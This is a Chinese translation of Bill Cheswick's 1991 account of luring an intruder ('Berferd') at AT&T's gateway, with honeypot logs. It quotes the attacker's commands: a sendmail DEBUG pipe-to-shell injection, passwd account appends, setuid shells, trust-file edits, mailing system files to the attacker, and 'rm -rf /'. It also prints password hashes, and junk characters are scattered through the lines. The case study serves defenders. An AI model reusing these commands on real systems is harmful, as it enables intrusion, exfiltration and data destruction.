引誘、欺騙并研究一個黑客——陪伴berferd的一個夜晚

在1991年1月7號，一個黑客，他確信自己發(fā)現(xiàn)了我們的Internet網(wǎng)關(guān)計(jì)算機(jī)的sendmail的一個DUBUG漏洞的黑客，試圖獲得我們的password文件，我“送”給他了一份。
5 P* n6 K1 S3 J在幾個月中，我們引誘這名黑客作各種快樂的嘗試，以便于我們發(fā)現(xiàn)他的位置和使用的破解技術(shù)。這篇文章是對該黑客的“成功”和失敗，我們使用的誘餌和陷阱的詳細(xì)記錄
; j% j6 _9 \$ u! w5 I0 c我們的結(jié)論是我們所遇到的這個黑客擁有大量的時間，固執(zhí)異常，并持有一份優(yōu)秀的系統(tǒng)漏洞列表。一旦他獲得了系統(tǒng)的一個正式注冊身份，使用那些漏洞他可以輕易的攻破uucp和bin帳號，然后是root。我們的黑客對軍事目標(biāo)和可以幫助他中轉(zhuǎn)其連接的新機(jī)器很感興趣。
簡介
1 Z+ f$ @9 ~) ~& ^* u" L0 ^我們的安全I(xiàn)nternet網(wǎng)關(guān)是1990年1月開始使用的。對于這個整個城堡的大門，我想知道它所可能遭到的攻擊會有多么頻繁。我明白Internet上有一些喜歡使用“暴力”的人，那么他們是誰？他們會攻擊什么地方？會多么頻繁？他們經(jīng)常嘗試系統(tǒng)的那些漏洞？
! m  g8 v- f+ _9 t9 z4 A* F/ d: V事實(shí)上，他們沒有對AT&T作出破壞，甚至很少光顧我們的這扇大門，那么，最終的樂趣只有如此，引誘一個黑客到一個我們設(shè)計(jì)好的環(huán)境中，記錄下來他的所有動作，研究其行為，并提醒他的下一個目標(biāo)作出防范。
" p; p% k. O, f, e8 W2 C大多數(shù)Internet上的工作站很少提供工具來作這些事情，商業(yè)系統(tǒng)檢測并報(bào)告一些問題，但是它們忽略了很多我們想要的東西。我們的網(wǎng)關(guān)每天產(chǎn)生10兆的日志文件。但人們對于日志記錄以外的服務(wù)的攻擊呢？
我們添加了一些虛假的服務(wù)在系統(tǒng)上，同時我編寫了一個script文件用來檢索每天的日志。我們檢查以下幾點(diǎn)：
) g" Z  R3 H0 ?- i9 Y) NFTP ：檢索的工具會報(bào)告每天所有注冊和試圖注冊的用戶名。它還會報(bào)告用戶對tilde的使用（這是個老版本的ftp的漏洞）、所有對ftp目錄的/etc/passwd和/etc/group的存取以及對pub目錄下完整文件列表的獲取。獲取passwd的人通常用它來獲得系統(tǒng)的正式用戶的注冊名稱，然后攻擊、破解其密碼。有時有些系統(tǒng)的管理員會將系統(tǒng)的真實(shí)passwd文件放在ftp的/etc目錄下，我們偽造了一個passwd文件，它的密碼被破解后是“why are you wasting your time.”
; i$ w' K) y6 R3 _. K! E3 eTelnet / login ：所有試圖login的動作都被記錄了下來。這很容易就可以看出有些人在嘗試很多帳號，或強(qiáng)力攻擊某一個帳號。因?yàn)槲覀冞@個Internet的大門除了“警衛(wèi)”外沒有什么別的用戶，很容易就可以找到問題所在。
, v  m3 K# w$ p% J  rGuest / visitor 帳號：黑客們第一個尋找的就是公用帳號。這些帳號提供了友好的，最輕易的獲取幾乎系統(tǒng)的所有文件的機(jī)會，包括passwd文件。黑客也可以通過獲取/etc/hosts.equiv文件或每個用戶的.rhosts文件來獲得機(jī)器的信任主機(jī)列表。我們對于這些帳號的login script文件是這樣編寫的：
7 i, K* I6 x( g# L) ]% [8 zexec 2>/dev/null # ensure that stderr doesn't appear
/ r( r  A2 @  rtrap "" 1
# d9 W' P- R1 e" c5 H) p/bin/echo
0 R  R) I  X( D/ E' b+ i( /bin/echo "Attempt to login to inet with $LOGNAME from $CALLER" |
( `8 {- x6 H) W9 W: X' eupasname=adm /bin/mail ches dangelo &
# (notify calling machine's administrator for some machines...)
1 Y1 t& o; M: G6 y% B# (finger the calling machine...)
) 2>&1 | mail ches dangelo
1 V5 T( ?) i9 J# f0 p/bin/echo "/tmp full"
) k( b! \- R& [$ \1 ~; \6 Tsleep 5 # I love to make them wait....
/bin/echo "/tmp full"
, x& g" S, \% X/bin/echo "/tmp full"
, @" |) \+ Y' n7 |4 I+ P/bin/echo
' ?# `: J6 A  i$ }0 j' o% \sleep 60 # ... and simulating a busy machine is useful
: Q: t* T& P  q1 F我們必須小心以便不讓調(diào)用者看到系統(tǒng)的標(biāo)志出錯信息（如果一旦我們編寫的script有誤）。注意$CALLER是在另一端的主機(jī)或IP地址。通過修改telnetd或login，它將可以通過環(huán)境變量來獲取。
SMTP DEBUG : 這個命令提供了兩個守候sendmail的漏洞的陷阱。雖然幾乎所有的產(chǎn)品出售商都清除了這個漏洞，但偶爾仍有黑客嘗試它。這個漏洞允許外部的使用者使用一段以root權(quán)限執(zhí)行的script。當(dāng)有些人嘗試這個漏洞時，我就獲得了他嘗試的script代碼。
* L  u$ c6 N! ]: i- J: P) w( s5 s' FFinger ：Finger提供了大量有用的信息給黑客：帳號名，該帳號的最后一次使用時間，以及一些可以用來猜測密碼的信息。由于我們的組織不允許提供這些信息給別人，我們置入了一個程序，在finger了fingerd的調(diào)用者后拒絕figner請求。（當(dāng)然我們會避免對來自自己的finger信息的死循環(huán)）。報(bào)告表明每天有數(shù)以十計(jì)的finger請求，其中大部分是合法的。
Rlogin / rsh ：這些命令都是基于一些無條件信任的系統(tǒng)，我們的機(jī)器并不支持。但我們會finger使用這些命令的用戶，并將他的嘗試和用戶信息等生成報(bào)告。
上述很多探測器都使用figner命令來查明調(diào)用的機(jī)器和使用者。
當(dāng)一個嘗試顯示為有不合法企圖時，我就發(fā)出這樣一條消息：
inetfans postmaster@sdsu.edu
% P& `, @) F8 J; @7 \Yesterday someone from math.sdsu.edu fetched the /etc/passwd file
from our FTP directory. The file is not important, but these probes
are sometimes performed from stolen accounts.
6 i, [$ B" J) S, ]( }- H/ Z! m* KJust thought you'd like to know.
Bill Cheswick
+ p+ s) T/ s( L, ^. y* U% f這是一個典型的信件，它被發(fā)往“inetfans”，這些人屬于計(jì)算機(jī)緊急響應(yīng)小組(Computer Emergency Response Team , CERT)、某些興趣小組或?qū)δ承┱军c(diǎn)感興趣的人。
( R# [+ b( g- o7 _# B) g* ?很多系統(tǒng)管理員很重視這些報(bào)告，尤其是軍事站點(diǎn)。通常，系統(tǒng)管理員在解決這些問題上都非常合作。對這些信件的反應(yīng)包括道歉，拒絕信件，關(guān)閉帳號以及沉默等等。當(dāng)一個站點(diǎn)開來愿意支持黑客們的活動時，我們會考慮拒收來自該站的所有信息包。
5 Y1 [% I8 [' Y' a8 o$ f* M不友好的行動
我們從1990年1月設(shè)置好這些探測器。統(tǒng)計(jì)表明被攻擊率在每年學(xué)校的假期期間會上升。我們的被攻擊率可能比其他站點(diǎn)高，因?yàn)槲覀兪菑V為人知的，并被認(rèn)為是“電話公司”。
: L! H1 M, ^- ?1 e) U) U+ ^: ?當(dāng)一個遠(yuǎn)程使用者取走passwd文件時，并不是所有的人都出于惡意的目的。有時他們只是想看看是否傳輸能正常工作。
19:43:10 smtpd[27466]: <--- 220 inet.att.com SMTP
19:43:14 smtpd[27466]: -------> debug
19:43:14 smtpd[27466]: DEBUG attempt
( x* Y8 H4 \- w& d- _& R19:43:14 smtpd[27466]: <--- 200 OK
! H; J8 ]. n9 C9 R19:43:25 smtpd[27466]: -------> mail from:
9 E7 q2 A8 R6 M& x! I19:43:25 smtpd[27466]: <--- 503 Expecting HELO
19:43:34 smtpd[27466]: -------> helo
( q* k5 P$ m7 m, M/ E, h2 f9 J19:43:34 smtpd[27466]: HELO from
8 e& n+ S: Q6 {7 V- e* ~19:43:34 smtpd[27466]: <--- 250 inet.att.com
19:43:42 smtpd[27466]: -------> mail from:
% h  u1 ], E" O! c& o2 P5 y0 Q2 K8 ]& Y19:43:42 smtpd[27466]: <--- 250 OK
% B( b8 t) s" z+ n19:43:59 smtpd[27466]: -------> rcpt to: 19:43:59 smtpd[27466]: <--- 501 Syntax error in recipient name
) v5 P4 s( P, Q% B! K6 K5 _19:44:44 smtpd[27466]: -------> rcpt to:<|sed -e '1,/?$/'d | /bin/sh ; exit 0">
+ ]0 m# B: V* X2 C19:44:44 smtpd[27466]: shell characters: |sed -e '1,/?$/'d | /bin/sh ; exit 0"
19:44:45 smtpd[27466]: <--- 250 OK
  Z( M! H6 F; s" y' N19:44:48 smtpd[27466]: -------> data
19:44:48 smtpd[27466]: <--- 354 Start mail input; end with .
19:45:04 smtpd[27466]: <--- 250 OK
0 Q' j  U, ?% H/ ^19:45:04 smtpd[27466]: /dev/null sent 48 bytes to upas.security
# ?( b' r; y% n. M1 l% S* p4 M19:45:08 smtpd[27466]: -------> quit
: j% o0 [3 H3 z0 C* n" ^' P! }19:45:08 smtpd[27466]: <--- 221 inet.att.com Terminating
19:45:08 smtpd[27466]: finished.
這是我們對SMTP過程的日志。這些看來很神秘的日志通常是有兩個郵件發(fā)送器來相互對話的。在這個例子中，另一端是由人來鍵入命令。他嘗試的第一個命令是DEBUG。當(dāng)他接收的“250 OK”的回應(yīng)時一定很驚奇。關(guān)鍵的行是“rcpt to :”。在尖括號括起的部分通常是一個郵件接收器的地址。這里它包含了一個命令行。Sendmail在DEBUG模式下用它來以ROOT身份執(zhí)行一段命令。即：
sed -e '1,/?$/'d | /bin/sh ; exit 0"
% c& X5 k8 W3 K4 j它剝?nèi)チ肃]件頭，并使用ROOT身份執(zhí)行了消息體。這段消息郵寄給了我，這是我記錄下來的，包含時間戳：
19:45 mail adrian@embezzle.stanford.edu 19:51 mail adrian@embezzle.stanford.edu 他希望我們郵寄給他一份我們的passwd文件。大概用來運(yùn)行一些passwd破解程序。所有這些探測結(jié)果都來自EMBEZZLE.STANFORD.EDU的一個adrian用戶。他在美國空襲伊拉克半個小時后公然作出敵意反應(yīng)。我懷疑是薩達(dá)姆雇傭了一兩個黑客。我恰巧在ftp的目錄下有一個假的passwd文件，就用root身份給Stanford發(fā)了過去。
: @6 M6 N0 V& ]! \: W第二個早晨，我聽到了來自Stanford的消息：他們知道了這件事，并正在發(fā)現(xiàn)問題所在。他們說adrian這個帳號被盜用了。
接著的一個星期天我接到了從法國發(fā)來的一封信：
To: root@research.att.com
8 j9 P; V+ \) ]* m8 `) \Subject: intruder
Date: Sun, 20 Jan 91 15:02:53 +0100
- |+ n/ Q; `9 QI have just closed an account on my machine
which has been broken by an intruder coming from embezzle.stanford.edu. He
$ k6 U/ ^( k, c% y1 I4 ^(she) has left a file called passwd. The contents are:
------------>
From root@research.att.com Tue Jan 15 18:49:13 1991
! f& I2 ]7 r# p, c' [0 nReceived: from research.att.com by embezzle.Stanford.EDU (5.61/4.7);
2 x9 d* J/ g9 s4 P& Y9 k, ETue, 15 Jan 91 18:49:12 -0800
% A+ u# U* w; u$ `# ^Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
From: root@research.att.com
Date: Tue, 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
Daemon: *:1:1:0000-Admin(0000):/:
( F: m2 I3 |4 t; H7 {2 w7 ]Bin: *:2:2:0000-Admin(0000):/bin:
Sys: *:3:3:0000-Admin(0000):/usr/v9/src:
8 Z. \7 U) r4 r( X5 nAdm: *:4:4:0000-Admin(0000):/usr/adm:
Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:
3 j0 W) T; g# E8 X0 w) tNuucp: *:10:10:0000-uucp(0000):/usr/spool/uucppublic:/usr/lib/uucp/uucico
Ftp: anonymous:71:14:file transfer:/:no soap
" G" K6 X/ y, ^7 d; t! r/ \5 o& o0 z* YChes: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
7 y+ R0 i5 r1 w& B1 `* [+ ^6 LDmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
Berferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
8 P4 |; i8 D) A; I0 K8 QTd: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
Status: R
3 @# l+ ]8 @. l5 O------------Please let me know if you heard of him.
5 O. J' p1 i  D陪伴Berferd的一個夜晚
) S4 }" m9 V; X. q( |; ^0 ?- R( ~) @. Y1月20號，星期天晚上，我的終端報(bào)告有安全敏感事件。
( _+ @- Z1 Q9 L% j% l# [* T! y22:33 finger attempt on berferd
幾分鐘后，有人試圖使用DEBUG來用ROOT身份執(zhí)行命令，他試圖修改我們的passwd文件！
2 a1 x9 O9 N# r8 K2 g+ `22:36 echo "beferdd::300:1:maybe Beferd:/:/bin/sh" >>/etc/passwd
2 t4 M5 v( b* {8 ?% @cp /bin/sh /tmp/shell
4 C0 O/ I4 N$ m5 C2 h# k4 ?4 ~! Cchmod 4755 /tmp/shell
9 t* O6 Q8 k4 O, d連接同樣來自EMBEZZLE.STANFORD.EDU。
2 B- ~& x+ W& v我該怎么作呢？我不希望他真的能獲得一個網(wǎng)關(guān)的帳號，為什么引狼入室呢？那樣我將得不到他的鍵盤活動。
我應(yīng)該繼續(xù)看看他關(guān)注的其他事情，或許我可以手工模擬一下操作系統(tǒng)，這意味著我必須讓他以為機(jī)器速度很慢，因?yàn)槲覠o法和MIPS M/120相比。同時意味著我必須模擬一個一致的操作系統(tǒng)。
6 w+ j5 r: C5 \# C% e3 f% E我已經(jīng)有一個要求了，因?yàn)樗呀?jīng)持有了一份passwd。
決定一：ftp的passwd是一個真實(shí)的passwd。
8 a  b3 U; s- V# q還有另外的兩個：
& h/ i+ \6 F! Y7 u- C決定二：網(wǎng)關(guān)機(jī)器管理極差。（有DEBUG漏洞，ftp目錄里有passwd）。
- }  {8 s; b+ ^' i+ [: X決定三：網(wǎng)關(guān)機(jī)器極慢。
. n. G% g. e% R/ A# w因此我決定讓他以為他已經(jīng)改變了passwd文件，但卻不急于讓他進(jìn)來。我必須生成一個帳號，但卻使它不可操作。我應(yīng)該怎么辦？
2 u: h9 E# E+ e0 J9 ~% X& I決定四：我的shell并沒有放在/bin下，它放在其他地方。這樣，他進(jìn)來后（讓他認(rèn)為passwd已經(jīng)改動了），沒有可運(yùn)行的shell。
4 z9 B& g# I' @這個決定很愚蠢，但我不會因此損失任何東西。我寫了一個script，生成了一個臨時帳號b，當(dāng)它被調(diào)用時它會給我發(fā)信，調(diào)用者將看到如下信息：
RISC/os (inet)
login: b
RISC/os (UMIPS) 4.0 inet
% [9 g& J# T4 v8 UCopyright 1986, MIPS Computer Systems
All Rights Reserved
Shell not found
2 `' H1 C+ k- t0 k9 V/ y我把b帳號在實(shí)際passwd文件中改成了beferd，當(dāng)我作完后，他在此嘗試：
3 A' F' m1 e9 A) o22:41 echo "bferd ::301:1::/:/bin/sh" >> /etc/passwd
他的另一個試圖添加到passwd文件的嘗試。事實(shí)上，在我為bferd完成新的配置之前他開始急躁了：
. k$ g3 O( d/ u22:45 talk adrian@embezzle.stand?Hford.edu
$ G2 i9 ^# g6 |$ n& s/ Stalk adrian@embezzle.stanford.edu
決定五：我們沒有talk這個命令。
他選擇了berferd這個帳號：
22:48 Attempt to login to inet with bferd from Tip-QuadA.Stanford.EDU
. }0 I! e- D. ?& R7 n; F22:48 Attempt to login to inet with bferd from Tip-QuadA.Stanford.EDU
22:49 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:51 (Notified Stanford of the use of Tip-QuadA.Stanford.EDU)
22:51 Attempt to login to inet with bferd from embezzle.Stanford.EDU
22:51 Attempt to login to inet with bferd from embezzle.Stanford.EDU
! R- k7 ~! @# ?0 q0 A1 C: s8 [22:55 echo "bfrd ::303:1::/tmp:/bin/sh" >> /etc/passwd
22:57 (Added bfrd to the real password file.)
22:58 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
! s5 ^! ^6 a& a! j! p22:58 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:05 echo "36.92.0.205" >/dev/null
2 |0 J$ H- B5 wecho "36.92.0.205 embezzle.stanford.edu">>/etc./?H?H?H
5 N! A; U( m$ ^0 o) [23:06 Attempt to login to inet with guest from rice-chex.ai.mit.edu
23:06 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts
23:08 echo "embezzle.stanford.edu adrian">>/tmp/.rhosts
0 e% G' M8 ^4 _/ I: R很顯然他希望能夠rlogin到我們的網(wǎng)關(guān)，這需要一些本地文件的特定設(shè)置。我們并沒有作rlogin的檢測。
# l. r7 K5 d( b這時他又有新的動作：
" T) W! N8 b$ ]  K- X2 d. G23:09 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
23:10 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
- W# w. S9 N6 c7 D* E; Y23:14 mail adrian@embezzle.stanford.edu < /etc/inetd.conf
& }4 i% `$ i4 v- w% ]. pps -aux|mail adrian@embezzle.stanford.edu
) E' T  c9 T5 e/ F9 b& A  ~  E2 B在rlogin失敗后，他希望能得到我們的inetd.conf文件來查看我們究竟啟動了什么服務(wù)。我不想讓他看到真正的inetd.conf，但偽造一個又非常困難。
決定七：網(wǎng)關(guān)機(jī)器運(yùn)行不穩(wěn)定，時有不確定事件。
23:28 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts
2 X7 g2 z! f2 v3 d8 n+ @9 gecho "embezzle.stanford.edu adrian" >> /tmp/.rhosts
ps -aux|mail adrian@embezzle.stanford.edu
: V* B* x! n! X* W. [. z- t" ]mail adrian@embezzle.stanford.edu < /etc/inetd.conf
  d4 f) k3 s# c7 P我不希望他看到ps的結(jié)果，幸運(yùn)的是，他的Berkeley系統(tǒng)的ps命令在我的System V機(jī)器上是無效的。
這時我通知了CERT，這時一起嚴(yán)重的攻擊事件，在Stanford也應(yīng)該有追蹤這些請求的人。這時，活動又轉(zhuǎn)到ftp上來：
Jan 20 23:36:48 inet ftpd[14437]: <--- 220 inet FTP server
+ f! x* x" r7 f6 P" a% ~2 d, M. k, [(Version 4.265 Fri Feb 2 13:39:38 EST 1990) ready.
Jan 20 23:36:55 inet ftpd[14437]: -------> user bfrd?M
/ ]! ]% C9 C2 o  ?/ w9 \/ cJan 20 23:36:55 inet ftpd[14437]: <--- 331 Password required for bfrd.
% B5 n0 M: t0 M7 G1 R3 IJan 20 23:37:06 inet ftpd[14437]: -------> pass?M
  X  H. l$ l9 N* b8 }Jan 20 23:37:06 inet ftpd[14437]: <--- 500 'PASS': command not understood.
Jan 20 23:37:13 inet ftpd[14437]: -------> pass?M
4 g9 E* c& Z4 E2 p7 h3 fJan 20 23:37:13 inet ftpd[14437]: <--- 500 'PASS': command not understood.
* d3 c) D1 l- MJan 20 23:37:24 inet ftpd[14437]: -------> HELP?M
; C$ @9 H. X- S/ Q2 C5 l9 l* o4 u1 xJan 20 23:37:24 inet ftpd[14437]: <--- 214- The following commands are
* j& e" g/ H3 erecognized (* =>'s unimplemented).
& M4 y! F: G5 TJan 20 23:37:24 inet ftpd[14437]: <--- 214 Direct comments to ftp-bugs@inet.
Jan 20 23:37:31 inet ftpd[14437]: -------> QUIT?M
Jan 20 23:37:31 inet ftpd[14437]: <--- 221 Goodbye.
6 K) ^2 n+ n1 [- ]0 m# }Jan 20 23:37:31 inet ftpd[14437]: Logout, status 0
Jan 20 23:37:31 inet inetd[116]: exit 14437
Jan 20 23:37:41 inet inetd[116]: finger request from 36.92.0.205 pid 14454
Jan 20 23:37:41 inet inetd[116]: exit 14454
! G$ Q) a, T2 o+ }' w4 O! }23:38 finger attempt on berferd
* z% A/ I( k- z23:48 echo "36.92.0.205 embezzle.stanford.edu" >> /etc/hosts.equiv
23:53 mv /usr/etc/fingerd /usr/etc/fingerd.b
5 c8 {" r7 A) T4 H/ Jcp /bin/sh /usr/etc/fingerd
決定四已經(jīng)決定了最后一行的嘗試必然失敗。因此，他只是破壞了我們模擬的機(jī)器上的finger而已，并沒有將之替換成一個shell程序。我關(guān)閉了實(shí)際的fingerd程序。
23:57 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
+ v1 w" U2 ?: N; D23:58 cp /bin/csh /usr/etc/fingerd
我們模擬的機(jī)器上csh并不在/bin下，因此這個命令無效。
( U( B+ w6 C) [5 h00:07 cp /usr/etc/fingerd.b /usr/etc/fingerd
  O% D# @; C9 f) J; V) y7 I好吧，fingerd現(xiàn)在重新開始工作。Berferd的恢復(fù)工作干的不錯。
) T- y3 j5 x  w00:14 passwd bfrt
5 Z! U5 X/ U. T8 }bfrt
bfrt
  e5 d! S: z, Y0 o/ p現(xiàn)在他試圖修改password，這永遠(yuǎn)不會成功，因?yàn)閜asswd的輸入是/dev/tty，不是sendmail所執(zhí)行的shell script。
00:16 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
- s: K8 f4 @: r00:17 echo "/bin/sh" > /tmp/Shell
chmod 755 /tmp/shell
: Y& H) R# P& O' Gchmod 755 /tmp/Shell
; B7 V2 j: [+ L00:19 chmod 4755 /tmp/shell
00:19 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:19 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
- G) H, o: n6 j' s6 q8 Q6 }00:21 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
00:21 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
# _! n0 ~' M9 c! A這時我已經(jīng)很累了。
01:55 rm -rf /&
喔?。√萘?！顯然機(jī)器的狀態(tài)讓他迷惑，他希望能清除所有的痕跡。有些黑客會保護(hù)自己所作的工作，聲明自己不作任何破壞。我們的黑客對我們感到疲勞了，因此以此結(jié)束。
他繼續(xù)工作了幾分鐘，后來放棄：
; |6 }( ]3 m+ F07:12 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
6 C2 M1 N/ o0 ]! o  [1 M07:14 rm -rf /&
07:17 finger attempt on berferd
07:19 /bin/rm -rf /&
6 g- \- C; K9 [# j  X+ L2 F/bin/rm -rf /&
5 t8 c; R) J: w# x9 O/ J07:23 /bin/rm -rf /&
& r2 E5 h+ H* T4 C7 ?# T7 E07:25 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
09:41 Attempt to login to inet with bfrd from embezzle.Stanford.EDU
6 R1 Y; V/ n8 F+ q( C